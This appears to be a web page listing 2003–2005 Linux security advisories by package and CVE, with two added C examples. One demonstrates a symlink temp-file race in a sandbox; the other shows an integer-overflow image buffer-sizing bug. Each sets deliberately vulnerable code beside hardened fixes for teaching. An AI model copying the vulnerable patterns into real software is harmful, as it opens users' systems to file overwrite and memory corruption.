| CVE #(s): | CAN-2004-0753, CAN-2004-0782, CAN-2004-0783, CAN-2004-0788 |
| Created: | September 15, 2004 |
| Updated: | February 25, 2005 |
| Description: | The gdk-pixbuf and gtk2 libraries contain vulnerabilities in their handling of BMP and XPM files which can lead to denial of service and, potentially, code execution attacks. |
gettext: Insecure temporary file handling
| Package(s): | gettext |
| CVE #(s): | CAN-2004-0966 |
| Created: | October 11, 2004 |
| Updated: | March 1, 2006 |
| Description: | gettext insecurely creates temporary files in world-writeable directories with predictable names. A local attacker could create symbolic links in the temporary files directory, pointing to a valid file somewhere on the filesystem. When gettext is called, this would result in file access with the rights of the user running the utility, which could be the root user. |
ghostscript: symlink vulnerabilities
| Package(s): | ghostscript |
| CVE #(s): | CAN-2004-0967 |
| Created: | October 20, 2004 |
| Updated: | September 28, 2005 |
| Description: | The ghostscript package (prior to version 7.07.1-r7) contains several scripts which are vulnerable to symlink attacks. |
glibc: Information leak with LD_DEBUG
| Package(s): | glibc |
| CVE #(s): | CAN-2004-1453 |
| Created: | August 17, 2004 |
| Updated: | May 26, 2005 |
| Description: | Silvio Cesare discovered a potential information leak in glibc. It allows LD_DEBUG on SUID binaries where it should not be allowed. This has various security implications, which may be used to gain confidential information. An attacker can gain the list of symbols a SUID application uses and their locations and can then use a trojaned library taking precedence over those symbols to gain information or perform further exploitation. |
glibc: tempfile vulnerability in catchsegv script
| Package(s): | glibc |
| CVE #(s): | CAN-2004-0968 |
| Created: | October 21, 2004 |
| Updated: | November 14, 2005 |
| Description: |
The catchsegv script in the glibc package has a symlink vulnerability
that may allow a local user to overwrite arbitrary files with the
permissions of the user that is running the script.
gnome-vfs: backend script vulnerabilities
| Package(s): | gnome-vfs |
| CVE #(s): | CAN-2004-0494 |
| Created: | August 4, 2004 |
| Updated: | February 21, 2005 |
| Description: |
Several scripts packaged with gnome-vfs, using its "extfs" capability, have security flaws. These scripts tend not to be used on many systems, but their presence can still be a threat.
groff: insecure temp file
| Package(s): | groff |
| CVE #(s): | CAN-2004-1296 |
| Created: | December 20, 2004 |
| Updated: | January 17, 2005 |
| Description: |
Javier Fernández-Sanguino Peña discovered that the auxiliary scripts
"eqn2graph" and "pic2graph" created temporary files in an insecure
way, which allowed exploitation of a race condition to create or
overwrite files with the privileges of the user invoking the program.
groff: insecure temporary directory
| Package(s): | groff |
| CVE #(s): | CAN-2004-0969 |
| Created: | November 1, 2004 |
| Updated: | February 9, 2006 |
| Description: |
Recently, Trustix Secure Linux discovered a vulnerability in the groff
package. The utility "groffer" created a temporary directory in an
insecure way, which allowed exploitation of a race condition to create
or overwrite files with the privileges of the user invoking the
program.
gtkhtml: malformed messages cause crash
| Package(s): | gtkhtml |
| CVE #(s): | CAN-2003-0133, CAN-2003-0541 |
| Created: | April 14, 2003 |
| Updated: | April 18, 2005 |
| Description: |
GtkHTML is the HTML rendering widget used by the Evolution mail reader.
The GtkHTML supplied with versions of Evolution prior to 1.2.4 contains a
bug in its handling of HTML messages. Alan Cox discovered that certain
malformed messages could cause the Evolution mail component to crash.
htmlheadline: insecure temporary files
| Package(s): | htmlheadline |
| CVE #(s): | CAN-2004-1181 |
| Created: | January 3, 2005 |
| Updated: | January 4, 2005 |
| Description: |
Javier Fernández-Sanguino Peña has discovered multiple insecure uses
of temporary files that could lead to overwriting arbitrary files via
a symlink attack.
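The gettext, ghostscript, catchsegv, groff and htmlheadline entries above all describe the same bug class: a utility writes to a guessable name in a world-writable directory, and a local attacker who pre-plants a symlink there gets the utility to truncate or overwrite whatever the link points at. The following added example (written for this page; it is not code from any of those packages, and the sandbox directory and file names it uses are constructed for the demonstration) reproduces the race in a private directory that stands in for /tmp, then shows the two standard fixes: opening with O_CREAT|O_EXCL so a pre-existing entry, symlink included, causes the open to fail, and letting mkstemp() pick an unpredictable name in the first place.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed scenario (hypothetical paths): a private sandbox stands in
 * for a world-writable /tmp. "victim.conf" is the file the attacker wants
 * clobbered; "util.1234" is the predictable name the utility is known to
 * use, under which the attacker has already planted a symlink. */
static char sandbox[] = "/tmp/tmprace-demo-XXXXXX";
static char victim[512];
static char predictable[512];

static int setup(void)
{
    if (mkdtemp(sandbox) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim.conf", sandbox);
    snprintf(predictable, sizeof predictable, "%s/util.%d", sandbox, 1234);

    FILE *f = fopen(victim, "w");
    if (f == NULL)
        return -1;
    fputs("important configuration\n", f);   /* 24 bytes */
    fclose(f);

    /* The attacker's move: point the guessable temp name at the victim. */
    return symlink(victim, predictable);
}

/* Current size of the victim file; -1 if it is gone. */
static long victim_size(void)
{
    struct stat st;
    return stat(victim, &st) == 0 ? (long)st.st_size : -1;
}

/* Vulnerable pattern, the C equivalent of `echo data > /tmp/util.$$`:
 * fopen(..., "w") follows the planted symlink and truncates the victim.
 * Returns 1 if the write went through. */
static int vulnerable_write(void)
{
    FILE *f = fopen(predictable, "w");
    if (f == NULL)
        return 0;
    fputs("scratch data\n", f);                /* 13 bytes */
    fclose(f);
    return 1;
}

/* Hardened pattern: O_EXCL makes open() fail if the name exists at all,
 * including when it is a (possibly dangling) symlink; O_NOFOLLOW is a
 * second line of defence. Returns 1 on success, 0 if the pre-planted
 * entry was refused (errno is EEXIST in that case). */
static int safe_write(void)
{
    int fd = open(predictable, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return 0;
    int ok = write(fd, "scratch data\n", 13) == 13;
    close(fd);
    return ok;
}

/* Preferred fix: let libc choose an unpredictable name with O_EXCL
 * semantics (the shell equivalent is mktemp(1)). Returns 1 on success. */
static int mkstemp_write(void)
{
    char tmpl[600];
    snprintf(tmpl, sizeof tmpl, "%s/util.XXXXXX", sandbox);
    int fd = mkstemp(tmpl);
    if (fd < 0)
        return 0;
    int ok = write(fd, "scratch data\n", 13) == 13;
    close(fd);
    unlink(tmpl);
    return ok;
}

/* Remove the sandbox again; returns 0 when everything was cleaned up. */
static int teardown(void)
{
    int rc = 0;
    rc |= unlink(predictable);
    rc |= unlink(victim);
    rc |= rmdir(sandbox);
    return rc;
}

int main(void)
{
    if (setup() != 0) {
        perror("setup");
        return 1;
    }
    printf("victim before:    %ld bytes\n", victim_size());
    printf("safe_write:       %s\n", safe_write() ? "wrote (unexpected)" : "refused");
    printf("mkstemp_write:    %s\n", mkstemp_write() ? "ok" : "failed");
    int hit = vulnerable_write();
    printf("vulnerable_write: %s, victim now %ld bytes\n",
           hit ? "overwrote the symlink target" : "failed", victim_size());
    return teardown();
}
```

Note that in shell scripts, the form these bugs took in the affected packages, the fix is the same idea: `t=$(mktemp) || exit 1` (or `mktemp -d` for a scratch directory) instead of a hand-built `/tmp/name.$$`, since the PID is trivially guessable and `>` redirection follows symlinks exactly as fopen("w") does here.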
imlib: buffer overflows in image decoding
| Package(s): | imlib |
| CVE #(s): | CAN-2004-1026 |
| Created: | December 6, 2004 |
| Updated: | January 13, 2005 |
| Description: |
Pavel Kankovsky discovered that several overflows found in the libXpm
library also applied to imlib. He also fixed a number of other potential
flaws. A remote attacker could entice a user to view a carefully-crafted
image file, which would potentially lead to execution of arbitrary code
with the rights of the user viewing the image. This affects any program
that makes use of the imlib library.
imlib2: buffer overflows
| Package(s): | imlib2 |
| CVE #(s): | CAN-2004-0802, CAN-2004-0817 |
| Created: | September 8, 2004 |
| Updated: | October 26, 2005 |
| Description: |
The imlib2 library contains buffer overflows in the BMP handling code.
iptables: missing initialization
| Package(s): | iptables |
| CVE #(s): | CAN-2004-0986 |
| Created: | November 1, 2004 |
| Updated: | February 11, 2005 |
| Description: |
Faheem Mitha noticed that the iptables command, an administration tool for
IPv4 packet filtering and NAT, did not always load the required kernel
modules on its own as it was supposed to. This could lead to firewall
rules silently not being loaded on system startup, leaving the host
unfiltered; the failure was observed at least with rules generated by
lokkit.
kdelibs: unwanted email origination
| Package(s): | kdelibs |
| CVE #(s): | |
| Created: | January 4, 2005 |
| Updated: | January 4, 2005 |
| Description: |
The Konqueror browser (via kdelibs) contains a vulnerability which can cause it to send email without the user's interaction or consent. See this bug report for details.
kerberos5: execution of arbitrary code by authenticated user
| Package(s): | kerberos5 |
| CVE #(s): | CAN-2004-1189 |
| Created: | December 21, 2004 |
| Updated: | February 15, 2005 |
| Description: |
There is a buffer overflow in the password history handling code of
libkadm5srv which could be exploited by an authenticated user to execute
arbitrary code on a Key Distribution Center (KDC) server.
kernel: 32bit emulation privilege escalation
| Package(s): | kernel |
| CVE #(s): | CAN-2004-1144 |
| Created: | December 23, 2004 |
| Updated: | January 5, 2005 |
| Description: |
The 32-bit emulation layer of the 2.4 Linux kernel on the AMD64 platform
has a missing argument checking vulnerability that can allow a local
attacker to gain root privileges.
kernel-utils: setuid vulnerability
| Package(s): | kernel-utils |
| CVE #(s): | CAN-2003-0019 |
| Created: | February 7, 2003 |
| Updated: | January 21, 2005 |
| Description: |
The kernel-utils package contains several utilities that can be used to
control the kernel or machine hardware. In Red Hat Linux 8.0 this package
contains user mode linux (UML) utilities.
The uml_net utility in the kernel-utils packages shipped with Red Hat Linux
8.0 was incorrectly installed setuid root. This could allow local users to
control certain network interfaces, add and remove ARP entries and routes,
and put interfaces in and out of promiscuous mode.
All users of the kernel-utils package should update to the packages that
contain a version of uml_net that is not setuid root.
Alternatively, as a work-around for this vulnerability, issue the following
command as root:
chmod -s /usr/bin/uml_net
libgd2: buffer overflows in PNG handling
| Package(s): | libgd2 |
| CVE #(s): | CAN-2004-0990, CAN-2004-0941 |
| Created: | October 29, 2004 |
| Updated: | June 28, 2006 |
| Description: |
Several buffer overflows have been discovered in libgd's PNG handling
functions.
If an attacker tricked a user into loading a malicious PNG image, they
could leverage this into executing arbitrary code in the context of
the user opening the image. Most importantly, this library is commonly
used from PHP. One possible target would be a PHP-driven photo website
that lets users upload images; there, the vulnerability might lead to
arbitrary code execution with the web server's privileges.
Multiple buffer overflows in the gd graphics library (libgd) 2.0.21 and
earlier may allow remote attackers to execute arbitrary code via malformed
image files that trigger the overflows due to improper calls to the
gdMalloc function.
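The gdk-pixbuf, imlib2 and libgd2 entries above say only that image decoders overflow buffers on crafted BMP and PNG files, and that libgd's problem lay in the sizes handed to gdMalloc. The most common shape of such a bug is the one the added example below illustrates; it is not a reconstruction of the actual bugs in any of those libraries, and the 40-byte header it parses is constructed here. A decoder takes width, height and bits-per-pixel from the file, multiplies them in 32-bit arithmetic to size its pixel buffer, and then fills the buffer row by row. When the product wraps, the allocation is tiny and the fill runs off the end of the heap. The hardened version validates each field and multiplies in a wider type against an explicit cap (the 256 MiB limit is an assumption for the example).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Upper bound the decoder is willing to allocate for one image (assumed). */
#define MAX_PIXEL_BYTES ((size_t)256 << 20)

struct bmp_dims {
    int32_t  width;
    int32_t  height;   /* negative in BMP means top-down row order */
    uint16_t bpp;
};

/* Little-endian field access; casting before shifting avoids signed overflow. */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Pull the three fields we need out of a 40-byte BITMAPINFOHEADER
 * (biSize at offset 0, biWidth at 4, biHeight at 8, biBitCount at 14). */
static int parse_info_header(const uint8_t *buf, size_t len, struct bmp_dims *d)
{
    if (len < 40 || rd32(buf) != 40)
        return -1;
    d->width  = (int32_t)rd32(buf + 4);
    d->height = (int32_t)rd32(buf + 8);
    d->bpp    = rd16(buf + 14);
    return 0;
}

/* Vulnerable pattern: buffer size computed in 32-bit arithmetic straight from
 * attacker-controlled dimensions. For a large width*height the product wraps,
 * the decoder allocates a small buffer, then writes width*height pixels into
 * it. Returns the (possibly wrapped) byte count the decoder would allocate. */
static uint32_t unsafe_pixel_bytes(const struct bmp_dims *d)
{
    return (uint32_t)d->width * (uint32_t)d->height * (uint32_t)(d->bpp / 8);
}

/* Hardened pattern: validate each field, then multiply in a wider type with
 * an explicit bound check before any allocation. Returns 0 to reject. */
static size_t safe_pixel_bytes(const struct bmp_dims *d)
{
    if (d->width <= 0 || d->height == 0 || d->height == INT32_MIN)
        return 0;
    if (d->bpp != 8 && d->bpp != 24 && d->bpp != 32)
        return 0;
    uint64_t rows = d->height < 0 ? (uint64_t)-(int64_t)d->height : (uint64_t)d->height;
    uint64_t row_bytes = (uint64_t)d->width * (d->bpp / 8);   /* <= 2^33, cannot wrap */
    if (row_bytes > MAX_PIXEL_BYTES / rows)                   /* exceeds cap or would wrap */
        return 0;
    return (size_t)(row_bytes * rows);
}

/* Constructed header with the given fields (biPlanes set to 1, rest zero). */
static void build_header(uint8_t hdr[40], int32_t w, int32_t h, uint16_t bpp)
{
    memset(hdr, 0, 40);
    wr32(hdr, 40);
    wr32(hdr + 4, (uint32_t)w);
    wr32(hdr + 8, (uint32_t)h);
    wr16(hdr + 12, 1);
    wr16(hdr + 14, bpp);
}

/* What the vulnerable sizing yields for a header with these fields. */
static uint32_t wrapped_size_for(int32_t w, int32_t h, uint16_t bpp)
{
    uint8_t hdr[40];
    struct bmp_dims d;
    build_header(hdr, w, h, bpp);
    return parse_info_header(hdr, sizeof hdr, &d) == 0 ? unsafe_pixel_bytes(&d) : 0;
}

/* What the hardened sizing yields (0 means the image is rejected). */
static size_t checked_size_for(int32_t w, int32_t h, uint16_t bpp)
{
    uint8_t hdr[40];
    struct bmp_dims d;
    build_header(hdr, w, h, bpp);
    return parse_info_header(hdr, sizeof hdr, &d) == 0 ? safe_pixel_bytes(&d) : 0;
}

/* A header shorter than 40 bytes must be refused before any field is read. */
static int truncated_header_rejected(void)
{
    uint8_t hdr[40];
    struct bmp_dims d;
    build_header(hdr, 640, 480, 24);
    return parse_info_header(hdr, 20, &d) == -1;
}

int main(void)
{
    printf("640x480x24:    unsafe=%u checked=%zu\n",
           wrapped_size_for(640, 480, 24), checked_size_for(640, 480, 24));
    /* 65536*65537 = 2^32 + 65536, so the 32-bit product wraps to 65536 */
    printf("65536x65537x32: unsafe=%u checked=%zu (0 = rejected)\n",
           wrapped_size_for(65536, 65537, 32), checked_size_for(65536, 65537, 32));
    return 0;
}
```

For the 65536x65537x32 header the vulnerable routine asks for 262144 bytes while the decoder goes on to write roughly 17 GB of pixels; the checked routine rejects the header outright. The same check belongs in front of every allocation that derives from file-controlled dimensions, including per-row buffers and palette sizes, and the cap should be set by the application rather than left at whatever the address space allows.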
libpng: multiple vulnerabilities
libtiff: buffer overflow
| Package(s): | libtiff |
| CVE #(s): | CAN-2004-1308 |
| Created: | December 22, 2004 |
| Updated: | May 19, 2005 |
| Description: |
The libtiff image manipulation library contains several exploitable buffer overflows.
libxml2: multiple buffer overflows
| Package(s): | libxml2 |
| CVE #(s): | CAN-2004-0989 |
| Created: | October 28, 2004 |
| Updated: | February 28, 2005 |
| Description: |
libxml2 prior to version 2.6.14 has multiple buffer overflow
vulnerabilities; if it is made to process a specially crafted FTP URL,
arbitrary code may be executed with the privileges of the application
using the library.
libxpm4: stack and integer overflows
| Package(s): | libxpm4 |
| CVE #(s): | CAN-2004-0687, CAN-2004-0688 |
| Created: | September 16, 2004 |
| Updated: | February 14, 2005 |
| Description: |
There are several stack and integer overflow bugs in the libXpm code of
XFree86 that may be used for a denial of service.
LinPopUp: buffer overflow in message reply
| Package(s): | linpopup |
| CVE #(s): | CAN-2004-1282 |
| Created: | January 4, 2005 |
| Updated: | January 10, 2005 |
| Description: |
Stephen Dranger discovered that LinPopUp contains a buffer overflow in
string.c, triggered when replying to a remote user message. A remote
attacker could craft a malicious message that, when replied to using
LinPopUp, would exploit the buffer overflow. This would result in the
execution of arbitrary code with the privileges of the user running
LinPopUp.